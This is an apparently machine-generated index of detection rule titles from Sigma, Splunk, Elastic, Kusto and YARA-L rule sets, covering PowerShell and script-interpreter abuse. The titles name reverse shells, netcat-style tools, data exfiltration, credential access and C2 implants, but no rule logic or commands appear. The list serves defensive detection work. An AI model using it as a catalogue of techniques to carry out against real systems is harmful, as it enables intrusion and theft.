- YARA-L Hacktool - IronSharpPack Execution
- Sigma HackTool - Jlaive In-Memory Assembly Execution test
- Sigma HackTool - Koadic Execution test
- Sigma HackTool - NetExec File Indicators experimental
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma HackTool - Sliver C2 Implant Activity Pattern test
- Sigma HackTool - Stracciatella Execution test
- Sigma Hacktool Ruler test
- Sigma Headless Process Launched Via Conhost.EXE test
- Sigma Hidden Powershell in Link File Pattern test
- Splunk High Entropy Powershell (PowerShell)
- Elastic Host File System Changes via Windows Subsystem for Linux production
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Splunk Impacket SMBexec (Windows Event Log)
- Splunk Impacket_Empire's WMIExec (Windows Event Log)
- Sigma Import PowerShell Modules From Suspicious Directories test
- Sigma Import PowerShell Modules From Suspicious Directories - ProcCreation test
- Elastic Incoming Execution via PowerShell Remoting production
- Sigma Install New Package Via Winget Local Manifest test
- Sigma Installation of WSL Kali-Linux experimental
- Sigma Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Splunk Invoke-Expression Command (PowerShell)
- Splunk Invoke-Expression Command (Sysmon)
- Splunk Invoke-Expression Command (Windows Event Log)
- Sigma Invoke-Obfuscation CLIP+ Launcher test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation CLIP+ Launcher - Security test
- Sigma Invoke-Obfuscation CLIP+ Launcher - System test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - Security test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - System test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - Security test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - System test
- Sigma Invoke-Obfuscation STDIN+ Launcher test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Powershell test
- Sigma Invoke-Obfuscation STDIN+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Security test
- Sigma Invoke-Obfuscation STDIN+ Launcher - System test
- Sigma Invoke-Obfuscation VAR+ Launcher test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation VAR+ Launcher - Security test
- Sigma Invoke-Obfuscation VAR+ Launcher - System test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System test
- Sigma Invoke-Obfuscation Via Stdin test
- Sigma Invoke-Obfuscation Via Stdin - Powershell test
- Sigma Invoke-Obfuscation Via Stdin - PowerShell Module test
- Sigma Invoke-Obfuscation Via Stdin - Security test
- Sigma Invoke-Obfuscation Via Stdin - System test
- Sigma Invoke-Obfuscation Via Use Clip test
- Sigma Invoke-Obfuscation Via Use Clip - Powershell test
- Sigma Invoke-Obfuscation Via Use Clip - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Clip - Security test
- Sigma Invoke-Obfuscation Via Use Clip - System test
- Sigma Invoke-Obfuscation Via Use MSHTA test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use MSHTA - Security test
- Sigma Invoke-Obfuscation Via Use MSHTA - System test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Rundll32 - Security test
- Sigma Invoke-Obfuscation Via Use Rundll32 - System test
- Splunk Invoke-WebRequest Command (PowerShell)
- Splunk Invoke-WebRequest Command (Sysmon)
- Splunk Invoke-WebRequest Command (Windows Event Log)
- Kusto Java Executing cmd to run Powershell available
- Splunk Jscript Execution Using Cscript App production
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Sigma Lace Tempest PowerShell Evidence Eraser test
- Sigma Lace Tempest PowerShell Launcher test
- Sigma Lazarus Group Activity test
- Sigma Linux Suspicious Child Process from Node.js - React2Shell experimental
- Sigma Malicious Base64 Encoded PowerShell Keywords in Command Lines test
- Sigma Malicious Nishang PowerShell Commandlets test
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Malicious PowerShell Keywords test
- Splunk Malicious PowerShell Process - Execution Policy Bypass production
- Splunk Malicious PowerShell Process With Obfuscation Techniques production
- Sigma Malicious PowerShell Scripts - FileCreation test
- Sigma Malicious PowerShell Scripts - PoshModule test
- Sigma Malicious ShellIntel PowerShell Commandlets test
- Sigma Manual Execution of Script Inside of a Compressed File test
- Sigma MERCURY APT Activity test
- Sigma Metasploit reverse shell injection in SQL Server experimental
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Elastic Microsoft Management Console File from Unusual Path production
- Kusto Midnight Blizzard - Script payload stored in Registry
- Sigma MMC Loading Script Engines DLLs experimental
- Splunk Modify Exchange Access Settings (PowerShell)
- Splunk MS Scripting Process Loading Ldap Module production
- Splunk MS Scripting Process Loading WMI Module production
- Sigma MSHTA Execution with Suspicious File Extensions test
- Sigma Net WebClient Casing Anomalies test
- Sigma Netcat The Powershell Version test
- Sigma Network Connection Initiated By PowerShell Process test
- Sigma Network Connection Initiated via Finger.EXE experimental
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Sigma New PowerShell Instance Created test
- Splunk NirCmd Execution (Sysmon)
- Splunk NirCmd Execution (Windows Event Log)
- Splunk Nishang PowershellTCPOneLine production
- Sigma Node Process Executions test
- Sigma NodeJS Execution of JavaScript File experimental
- Sigma Non Interactive PowerShell Process Spawned test
- Splunk Non-MSIExec .msi Installation (PowerShell)
- Splunk Non-MSIExec .msi Installation (Windows Event Log)
- Kusto NRT Base64 Encoded Windows Process Command-lines available
- Kusto NRT Process executed from binary hidden in Base64 encoded file available
- Sigma Nslookup PowerShell Download Cradle test
- Sigma NTFS Alternate Data Stream test
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Sigma Obfuscated PowerShell OneLiner Execution test
- Kusto Office Apps Launching Wscipt available
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Sigma Operator Bloopers Cobalt Strike Commands test
- Sigma Operator Bloopers Cobalt Strike Modules test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Outlook EnableUnsafeClientMailRules Setting Enabled test
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Splunk Parent in Public Folder Suspicious Process (Sysmon)
- Splunk Parent in Public Folder Suspicious Process (Windows Event Log)
- Sigma Payload downloaded via PowerShell
- Sigma PCRE.NET Package Image Load test
- Sigma PCRE.NET Package Temp Files test
- Sigma Perl Inline Command Execution test
- Sigma Php Inline Command Execution test
- Sigma PipeShell exfiltration over named pipes experimental
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential APT FIN7 Exploitation Activity test
- Sigma Potential APT FIN7 POWERHOLD Execution test
- Sigma Potential APT10 Cloud Hopper Activity test
- Sigma Potential Arbitrary Command Execution Via FTP.EXE test
- Sigma Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt test
- Splunk Potential AutoHotkey .ahk Execution (PowerShell)
- Splunk Potential AutoHotkey .ahk Execution (Sysmon)
- Splunk Potential AutoHotkey .ahk Execution (Windows Event Log)
- Sigma Potential Baby Shark Malware Activity test
- Sigma Potential BlackByte Ransomware Activity test
- Sigma Potential Bumblebee Remote Thread Creation test
- Sigma Potential CobaltStrike Process Patterns test
- Elastic Potential Command Shell via NetCat production
- Sigma Potential CommandLine Path Traversal Via Cmd.EXE test
- Sigma Potential CVE-2021-40444 Exploitation Attempt test
- Sigma Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution test
- Sigma Potential Data Exfiltration Activity Via CommandLine Tools test
- Sigma Potential DLL File Download Via PowerShell Invoke-WebRequest test
- Sigma Potential Dosfuscation Activity test
- Sigma Potential Dropper Script Execution Via WScript/CScript/MSHTA test
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Sigma Potential Emotet Activity stable
- Sigma Potential Encoded PowerShell Patterns In CommandLine test
- Elastic Potential Execution via FileFix Phishing Attack production
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential KamiKakaBot Activity - Lure Document Execution test
- Sigma Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script test
- Sigma Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE test
- Sigma Potential PowerShell Command Line Obfuscation test
- Sigma Potential PowerShell Downgrade Attack test
- Sigma Potential PowerShell Obfuscation Using Alias Cmdlets test
- Sigma Potential PowerShell Obfuscation Using Character Join test
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Sigma Potential PowerShell Obfuscation Via Reversed Commands test
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Sigma Potential PowerShell Obfuscation Via WCHAR/CHAR test
- Splunk Potential PowerShell Post-Exploitation Activity (Sysmon)
- Splunk Potential PowerShell Post-Exploitation Activity (Windows Event Log)
- Sigma Potential Powershell ReverseShell Connection stable
- Sigma Potential POWERTRASH Script Execution test
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Sigma Potential QBot Activity stable
- Sigma Potential Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Sigma Potential Remote PowerShell Session Initiated test
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Potential SAP NetWeaver Webshell Creation experimental
- Sigma Potential SAP NetWeaver Webshell Creation - Linux experimental
- Elastic Potential SharpRDP Behavior production
- Sigma Potential Suspicious PowerShell Keywords test
- Elastic Potential Veeam Credential Access Command production
- Sigma Potential WinAPI Calls Via PowerShell Scripts test
- Sigma Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell stable
- Sigma Potentially Suspicious Command Executed Via Run Dialog Box - Registry test
- Sigma Potentially Suspicious Execution From Parent Process In Public Folder test
- Sigma Potentially Suspicious Inline JavaScript Execution via NodeJS Binary experimental
- Sigma Potentially Suspicious Long Filename Pattern - Linux experimental
- Sigma Potentially Suspicious NTFS Symlink Behavior Modification test
- Sigma Potentially Suspicious PowerShell Child Processes test
- Sigma Potentially Suspicious Powershell Script Execution From Temp Folder test
- Sigma Potentially Suspicious WebDAV LNK Execution test
- Splunk PowerShell - Connect To Internet With Hidden Window production
- Splunk PowerShell 4104 Hunting production
- Sigma PowerShell ADRecon Execution test
- Sigma PowerShell Base64 Encoded FromBase64String Cmdlet test
- Sigma PowerShell Base64 Encoded IEX Cmdlet test
- Sigma PowerShell Base64 Encoded Invoke Keyword test
- Sigma PowerShell Base64 Encoded Reflective Assembly Load test
- Sigma PowerShell Base64 Encoded WMI Classes test
- Sigma PowerShell Called from an Executable Version Mismatch test
- Splunk PowerShell Clipboard Access (PowerShell)
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Sigma PowerShell Core DLL Loaded By Non PowerShell Process test
- Sigma PowerShell Create Local User test
- Splunk PowerShell CreateDecryptor (PowerShell)
- Splunk PowerShell CreateDecryptor (Sysmon)
- Splunk PowerShell CreateDecryptor (Windows Event Log)
- Splunk Powershell Creating Thread Mutex production
- Sigma PowerShell Credential Prompt test
- Splunk PowerShell Domain Enumeration production
- Splunk PowerShell Downgrade (PowerShell)
- Splunk PowerShell Downgrade (Sysmon)
- Splunk PowerShell Downgrade (Windows Event Log)
- Sigma PowerShell Downgrade Attack - PowerShell test
- Splunk PowerShell Download Activity (PowerShell)
- Sigma PowerShell Download and Execution Cradles test
- Sigma PowerShell Download Pattern test
- Sigma PowerShell Download Via Net.WebClient - PowerShell Classic test
- YARA-L PowerShell DownloadFile
- Splunk PowerShell DownloadFile_DownloadString (PowerShell)
- Splunk PowerShell DownloadFile_DownloadString (Sysmon)
- Splunk PowerShell DownloadFile_DownloadString (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerShell Enable PowerShell Remoting production
- Splunk PowerShell Environment Variable Execution production
- Sigma Powershell Execute Batch Script test
- Splunk Powershell Execute COM Object production
- Sigma Powershell Executed From Headless ConHost Process test
- Splunk Powershell Fileless Process Injection via GetProcAddress production
- Splunk Powershell Fileless Script Contains Base64 Encoded Content production
- Splunk PowerShell Hidden Window (PowerShell)
- Splunk PowerShell Hidden Window (Windows Event Log)
- Splunk Powershell ICMP Data Exfiltration (PowerShell)
- Sigma Powershell Inline Execution From A File test
- Splunk Powershell Load Module in Meterpreter production
- Splunk PowerShell Loading DotNET into Memory via Reflection production
- Splunk PowerShell Modifying Registry Values (PowerShell)
- Splunk PowerShell Modifying Registry Values (Sysmon)
- Splunk PowerShell Modifying Registry Values (Windows Event Log)
- Sigma PowerShell MSI Install via WindowsInstaller COM From Remote Location experimental
- Sigma Powershell MsXml COM Object test
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Powershell Processing Stream Of Data production
- Sigma PowerShell PSAttack test
- Sigma PowerShell Remote Session Creation test
- Splunk PowerShell Script Block With URL Chain production
- Sigma PowerShell Script Run in AppData test
- Sigma PowerShell ShellCode test
- Splunk PowerShell Start or Stop Service production
- Splunk Powershell Using memory As Backing Store production
- Sigma PowerShell Web Access Installation - PsScript test
- YARA-L PowerShell Web Download
- Splunk PowerShell WebRequest Using Memory Stream production
- Kusto PowerShell without powershell.exe
- Sigma Powershell XML Execute Command test
- Splunk PowerShell XML Retrieval (PowerShell)
- Splunk PowerShell XML Retrieval (Sysmon)
- Splunk PowerShell XML Retrieval (Windows Event Log)
- Sigma PowerView PowerShell Cmdlets - ScriptBlock test
- Splunk PowerView_SharpView Commands (PowerShell)
- Elastic Process Activity via Compiled HTML File production
- Kusto Process Creation with Suspicious CommandLine Arguments available
- Kusto Process executed from binary hidden in Base64 encoded file available
- Kusto Process Execution Frequency Anomaly available
- Splunk Process Writing DynamicWrapperX production
- Elastic Proxy Execution via Console Window Host production
- Sigma PSAsyncShell - Asynchronous TCP Reverse Shell test
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - Wsudo Suspicious Execution test
- Splunk Python Execution (Windows Event Log)
- Sigma Python Inline Command Execution test
- Sigma Python One-Liners with Base64 Decoding experimental
- Sigma Python Path Configuration File Creation - Linux test
- Sigma Python Path Configuration File Creation - MacOS test
- Sigma Python Path Configuration File Creation - Windows test
- Sigma Python Spawning Pretty TTY on Windows test
- Kusto Qakbot Discovery Activies available
- Splunk Rare Process Execution (Sysmon)
- Splunk Rare Process Execution (Windows Event Log)
- Sigma Raspberry Robin Initial Execution From External Drive test
- Sigma Raspberry Robin Subsequent Execution of Commands test
- Sigma Read Contents From Stdin Via Cmd.EXE test
- Splunk Recon Using WMI Class production
- Kusto RecordedFuture Threat Hunting Hash All Actors
- Sigma Registry Modification Attempt Via VBScript experimental
- Sigma Registry Modification Attempt Via VBScript - PowerShell experimental
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Registry Tampering by Potentially Suspicious Processes experimental
- Sigma Remote Access Tool - ScreenConnect Command Execution test
- Sigma Remote Access Tool - ScreenConnect File Transfer test
- Sigma Remote Access Tool - ScreenConnect Remote Command Execution test
- Sigma Remote Access Tool - ScreenConnect Temporary File test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Elastic Remote File Download via PowerShell production
- Elastic Remote File Download via Script Interpreter production
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Remote PowerShell Session (PS Classic) test
- Sigma Remote PowerShell Session (PS Module) test
- Sigma Remote PowerShell Session Host Process (WinRM) test
- Sigma Remote PowerShell Sessions Network Connections (WinRM) test
- Sigma Remote Thread Creation Via PowerShell test
- Sigma Remote Thread Creation Via PowerShell In Uncommon Target test
- Elastic Remote XSL Script Execution via COM production
- Elastic Renamed Automation Script Interpreter production
- Sigma Renamed CURL.EXE Execution test
- Sigma Renamed FTP.EXE Execution test
- Sigma Renamed NirCmd.EXE Execution test
- Sigma Renamed PingCastle Binary Execution test
- Sigma Renamed Powershell Under Powershell Channel test
- Sigma REvil Kaseya Incident Malware Patterns test
- Sigma Rorschach Ransomware Execution Activity test
- Sigma Ruby Inline Command Execution test
- Sigma Run PowerShell Script from Redirected Input Stream test
- Splunk Ryuk Wake on LAN Command production
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Splunk Script Connected to External Destination - Windows (Sysmon)
- Splunk Script Connected to External Destination - Windows (Windows Event Log)
- Elastic Script Execution via Microsoft HTML Application production
- Sigma Script Interpreter Execution From Suspicious Folder test
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Sigma Script Interpreter Spawning Credential Scanner - Windows experimental
- Sigma Serial console process spawning CMD shell (via command) experimental
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Set Default PowerShell Execution Policy To Unrestricted or Bypass production
- Sigma Shai-Hulud Malware Indicators - Linux experimental
- Sigma Shai-Hulud Malware Indicators - Windows experimental
- Splunk SharpHound Enumeration (Windows Event Log)
- Sigma Silence.EDA Detection test
- Splunk Sliver C2 Implant Activity Pattern (PowerShell)
- Splunk Sliver C2 Implant Activity Pattern (Sysmon)
- Splunk Sliver C2 Implant Activity Pattern (Windows Event Log)
- Sigma Sofacy Trojan Loader Activity test
- Sigma SQL Client Tools PowerShell Session Detection test
- Kusto SUNBURST and SUPERNOVA backdoor hashes available
- Kusto SUNBURST and SUPERNOVA backdoor hashes (Normalized File Events)
- Kusto SUNBURST network beacons available
- Kusto SUNBURST suspicious SolarWinds child processes (Normalized Process Events)
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious ArcSOC.exe Child Process experimental
- Splunk Suspicious Child Process for mshta.exe (Sysmon)
- Splunk Suspicious Child Process for mshta.exe (Windows Event Log)
- Sigma Suspicious Child Process Of BgInfo.EXE test
- Sigma Suspicious Child Process of SAP NetWeaver experimental
- Sigma Suspicious Child Process of SAP NetWeaver - Linux experimental
- Elastic Suspicious Cmd Execution via WMI production
- Elastic Suspicious Command Prompt Network Connection production
- Sigma Suspicious CrushFTP Child Process experimental
- Sigma Suspicious Deno File Written from Remote Source experimental
- Sigma Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call test
- Sigma Suspicious Encoded PowerShell Command Line test
- Splunk Suspicious Executable by CMD.exe (Sysmon)
- Splunk Suspicious Executable by CMD.exe (Windows Event Log)
- Splunk Suspicious Executable by Powershell (EDR)
- Splunk Suspicious Executable by Powershell (Sysmon)
- Splunk Suspicious Executable by Powershell (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Sigma Suspicious Execution of Powershell with Base64 test
- Elastic Suspicious Execution via Windows Subsystem for Linux production
- Elastic Suspicious Execution with NodeJS production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious File Characteristics Due to Missing Fields test
- Sigma Suspicious File Created In PerfLogs test
- Sigma Suspicious File Execution From Internet Hosted WebDav Share test
- Sigma Suspicious Greedy Compression Using Rar.EXE test
- Sigma Suspicious HH.EXE Execution test
- Sigma Suspicious HWP Sub Processes test
- Sigma Suspicious Interactive PowerShell as SYSTEM test
- Elastic Suspicious JavaScript Execution via Deno production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Sigma Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script test
- Splunk Suspicious Powershell (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (Sysmon)
- Splunk Suspicious PowerShell Clipboard Activity (Windows Event Log)
- Kusto Suspicious Powershell Commandlet Executed available
- Sigma Suspicious PowerShell Download - PoshModule test
- Sigma Suspicious PowerShell Download - Powershell Script test
- Sigma Suspicious PowerShell Download and Execute Pattern test
- Sigma Suspicious PowerShell Encoded Command Patterns test
- Sigma Suspicious PowerShell IEX Execution Patterns test
- Sigma Suspicious PowerShell Invocation From Script Engines test
- Sigma Suspicious PowerShell Invocations - Generic test
- Sigma Suspicious PowerShell Invocations - Generic - PowerShell Module test
- Sigma Suspicious PowerShell Invocations - Specific test
- Sigma Suspicious PowerShell Invocations - Specific - PowerShell Module test
- Sigma Suspicious PowerShell Parameter Substring test
- Splunk Suspicious PowerShell Parameter Substring (PowerShell)
- Splunk Suspicious PowerShell Parameter Substring (Sysmon)
- Splunk Suspicious PowerShell Parameter Substring (Windows Event Log)
- Sigma Suspicious PowerShell Parent Process test
- Sigma Suspicious PrinterPorts Creation (CVE-2020-1048) test
- Splunk Suspicious Process DNS Query Known Abuse Web Services production
- Sigma Suspicious Process Spawned by CentreStack Portal AppPool experimental
- Splunk Suspicious Process With Discord DNS Query production
- Sigma Suspicious Program Names test
- Sigma Suspicious RASdial Activity test
- Splunk Suspicious reCAPTCHA Command Line (PowerShell)
- Splunk Suspicious reCAPTCHA Command Line (Sysmon)
- Sigma Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Sigma Suspicious Remote Child Process From Outlook test
- Sigma Suspicious Runscripthelper.exe test
- Sigma Suspicious Scan Loop Network test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Scripting in a WMI Consumer test
- Elastic Suspicious Shell Execution via Velociraptor production
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Suspicious Usage of For Loop with Recursive Directory Search in CMD experimental
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Suspicious Windows Powershell Arguments production
- Sigma Suspicious WSMAN Provider Image Loads test
- Sigma Suspicious XOR Encoded PowerShell Command test
- Elastic Suspicious Zoom Child Process production
- Sigma Sysprep on AppData Folder test
- Elastic System Information Discovery via Windows Command Shell production
- Elastic System Shells via Services production
- Kusto TEARDROP memory-only dropper available
- Sigma TropicTrooper Campaign November 2018 stable
- Sigma Turla Group Commands May 2020 test
- Sigma Turla Group Lateral Movement test
- Sigma UNC2452 PowerShell Pattern test
- Sigma UNC2452 Process Creation Patterns test
- Sigma Uncommon Child Process Of BgInfo.EXE test
- Sigma Uncommon PowerShell Hosts test
- Splunk Unloading AMSI via Reflection production
- Sigma Unusual Parent Process For Cmd.EXE test
- Elastic Unusual Parent Process for cmd.exe production
- Elastic Unusual Process For MSSQL Service Accounts production
- Sigma Unusually Long PowerShell CommandLine test
- Sigma Ursnif Redirection Of Discovery Commands test
- Sigma Usage Of Web Request Commands And Cmdlets test
- Sigma Usage Of Web Request Commands And Cmdlets - ScriptBlock test
- Sigma Use of FSharp Interpreters test
- Sigma Use of OpenConsole test
- Sigma Use of Pcalua For Execution test
- Splunk Vbscript Execution Using Wscript App production
- Elastic Veeam Backup Library Loaded by Unusual Process production
- Sigma Vice Society directory crawling script for data exfiltration (via ps_script) stable
- Sigma VMToolsd Suspicious Child Process test
- Elastic Volume Shadow Copy Deletion via PowerShell production
- Splunk WebDAV LNK Execution (Sysmon)
- Splunk WebDAV LNK Execution (Windows Event Log)
- Splunk WebLogic CVE-2017-10271 (PowerShell)
- Splunk WebLogic CVE-2017-10271 (Sysmon)
- Splunk WebLogic CVE-2017-10271 (Windows Event Log)
- Splunk Wermgr Process Spawned CMD Or Powershell Process production
- Sigma WinAPI Function Calls Via PowerShell Scripts test
- Sigma WinAPI Library Calls Via PowerShell Scripts test
- Splunk Windows Account Access Removal via Logoff Exec production
- Splunk Windows Apache Benchmark Binary production
- Splunk Windows AutoIt3 Execution production
- Kusto Windows Binaries Executed from Non-Default Directory available
- Kusto Windows Binaries Lolbins Renamed available
- Splunk Windows Cmdline Tool Execution From Non-Shell Process production
- Splunk Windows Cobalt Strike PowerShell Loader production
- Splunk Windows Command and Scripting Interpreter Hunting Path Traversal production
- Splunk Windows Command and Scripting Interpreter Path Traversal Exec production
- Splunk Windows Command Shell DCRat ForkBomb Payload production
- Splunk Windows Copy Files (PowerShell)
- Splunk Windows Copy Files (Sysmon)
- Splunk Windows Copy Files (Windows Event Log)
- Splunk Windows Crowdstrike RTR Script Execution production
- Splunk Windows Default Cobalt Strike PowerShell Beacon production
- Sigma Windows Defender AMSI Trigger Detected stable
- Splunk Windows Defender ASR Audit Events production
- Splunk Windows Defender ASR Block Events production
- Splunk Windows Defender ASR Rules Stacking production
- Sigma Windows Defender Exclusions Added - PowerShell test
- Elastic Windows Defender Exclusions Added via PowerShell production
- Sigma Windows Defender Threat Detected stable
- Splunk Windows Enable PowerShell Web Access production
- Splunk Windows Explorer LNK Exploit Process Launch With Padding production
- Splunk Windows Explorer.exe Spawning PowerShell or Cmd production
- Splunk Windows File Association Modification via Ftype production
- Splunk Windows File Download Via PowerShell production
- Elastic Windows Firewall Disabled via PowerShell production
- Splunk Windows GrimResource - MMC Process Accessing APDS DLL production
- Splunk Windows Identify Protocol Handlers production
- Splunk Windows Outlook Macro Created by Suspicious Process production
- Splunk Windows PaperCut NG Spawn Shell production
- Splunk Windows Powershell Cryptography Namespace production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
- Splunk Windows PowerShell Get CIMInstance Remote Computer production
- Splunk Windows Powershell History File Deletion production
- Splunk Windows Powershell Import Applocker Policy production
- Splunk Windows PowerShell Invoke-RestMethod IP Information Collection production
- Splunk Windows PowerShell Invoke-Sqlcmd Execution production
- Splunk Windows Powershell Logoff User via Quser production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows PowerShell Process Implementing Manual Base64 Decoder production
- Splunk Windows PowerShell Process With Malicious String production
- Splunk Windows Powershell RemoteSigned File production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows PowerShell Script Block With Malicious String production
- Splunk Windows PowerShell Script From WindowsApps Directory production
- Splunk Windows PowerShell Script TabExpansion Direct Call production
- Splunk Windows PowerShell WMI Win32 ScheduledJob production
- Splunk Windows PowGoop Beacon Decoding production
- Splunk Windows Process Accessing Windows Recall Directory production
- Splunk Windows Process Execution From RDP Share production
- Splunk Windows Remote Image Load production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Execution from Archive production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows Shell Process from CrushFTP production
- Sigma Windows Shell/Scripting Application File Write to Suspicious Folder test
- Sigma Windows Shell/Scripting Processes Spawning Suspicious Programs test
- Splunk Windows Software Discovery Via PowerShell production
- Splunk Windows SQL Server Extended Procedure DLL Loading Hunt production
- Splunk Windows SQLCMD Execution production
- Splunk Windows SSH Proxy Command production
- Elastic Windows Subsystem for Linux Distribution Installed production
